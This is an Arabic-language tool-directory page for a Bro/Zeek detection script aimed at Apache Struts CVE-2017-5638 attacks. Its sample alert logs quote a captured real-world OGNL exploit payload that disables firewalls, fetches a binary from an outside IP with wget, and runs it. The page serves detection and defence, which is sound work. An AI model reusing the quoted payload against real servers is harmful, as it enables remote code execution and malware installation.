Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-5638_struts — سكربت Bro/Zeek لكشف استطلاع Apache Struts CVE-2017-5638، والاختراق، وتتبع تنزيل البرامج الضارة مع استخراج IP تلقائي. | Kitploit
أدوات/GitHubGitHub/initconf/cve-2017-5638_struts
تحليل الثغرات الأمنيةالاستغلالأمن الشبكاتتحليل البرمجيات الخبيثةاستخبارات التهديداتكشف التسلل
GitHubinitconf/cve-2017-5638_struts

CVE-2017-5638_struts

سكربت Bro/Zeek لكشف استطلاع Apache Struts CVE-2017-5638، والاختراق، وتتبع تنزيل البرامج الضارة مع استخراج IP تلقائي.

عرض المستودع
823منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

لقد قمت بتوسيع سكربت سكوت كامبل أكثر، وجعلته أكثر تعقيدًا :)

بينما سيقوم "HTTP_StrutsAttack" بإيقاف 100% من الاستطلاع، لا يزال هناك فرصة ضئيلة أنه إذا ضرب ماسح ضوئي نظامًا ضعيفًا، حتى لو قمنا بحظر الماسح، قد يقوم النظام الضعيف بتنفيذ wget المضمن في طلب HTTP وتنفيذ البرامج الضارة. نظرًا لأننا لا نقوم بحظر عنوان IP لتنزيل البرامج الضارة في رابط wget والذي يكون دائمًا تقريبًا عنوان IP مختلفًا عن عنوان IP الاستطلاع.

لذلك فإن السكربت الموسع يقوم أيضًا باستخراج عنوان IP لتنزيل البرامج الضارة.

  1. قم بتوليد الإشعارات التالية:

    root@kitploit:~
     redef enum Notice::Type += {
             Attempt,
             MalwareURL,
             HostileDomainLookup,
             MalwareURLClick,
             FileDownload,
             Compromise,
     };
    
  • الآن هذا السكربت سيستخرج رابط wget من Attempt، ثم إذا كان الرابط يحتوي على نطاق (أو نطاق اسم مستعار CNAME)، سيقوم السكربت بتتبع عناوين IP لمضيف البرامج الضارة ومراقبة النشاط.

  • إذا تم رؤية رابط wget في HTTP، سنقوم بتوليد إشعار MalwareURLClick.

  • وإشعارات إضافية لـ FileDownload و Compromise.

  • هذا السكربت أيضًا موزع على الكتلة (Clusterized).

لقد قمت بتشغيله لمدة 24 ساعة وتبدو الأمور مستقرة بالنسبة للسكربت. ما زلت متأكدًا من أنه قد يكون هناك بعض الثغرات البسيطة في الكشف. لذا لا تتردد في التعديل وإخباري أيضًا.

بشكل مثير للدهشة، على عكس المرات السابقة، لا أرى حجمًا كبيرًا من ماسحات Struts. أرى حوالي 20 ماسحًا في اليوم بدلاً من حوالي 1000 في اليوم.

فيما يلي أمثلة على الإشعارات:

1489228734.171565 CbVq832QovIwAQddf2 1.24.191.108 65000 131.243.X.Y 80 - - - tcp Struts::Attempt CVE-2017-5638/Struts attack from 1.24.191.108 seen: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c 777 xhx;./xhx;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} - 1.24.191.108 131.243.X.Y 80 - worker-5 Notice::ACTION_LOG 3600.000000 F - -- - -

http://121.42.249.245:1996/xhx;chmod

1489237401.399275 C90k4o1Zrn8D7vaXoe 124.117.244.34 49728 128.3.Y.Z 80 - - - tcp Struts::MalwareURL Struts Hostile URLs seen in recon attempt 124.117.244.34 to 128.3.Y.Z with URL [http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;] - 124.117.244.34 128.3.Y.Z 80 - worker-13 Notice::ACTION_LOG 3600.000000 F - - - - -

1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::MalwareURLClick Struts Hostile URL seen 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 60.000000 F - - - - -

1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::Compromise Struts compromise: 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F - - - - -

1489240940.206456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 Frx9jZ1JkcrsVtgOkg application/x-executable http://121.42.249.245:1996/tcp/xhx tcp Struts::FileDownload http://121.42.249.245:1996/tcp/xhx http://121.42.249.245:1996/tcp/xhx 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F

تنزيل الأداة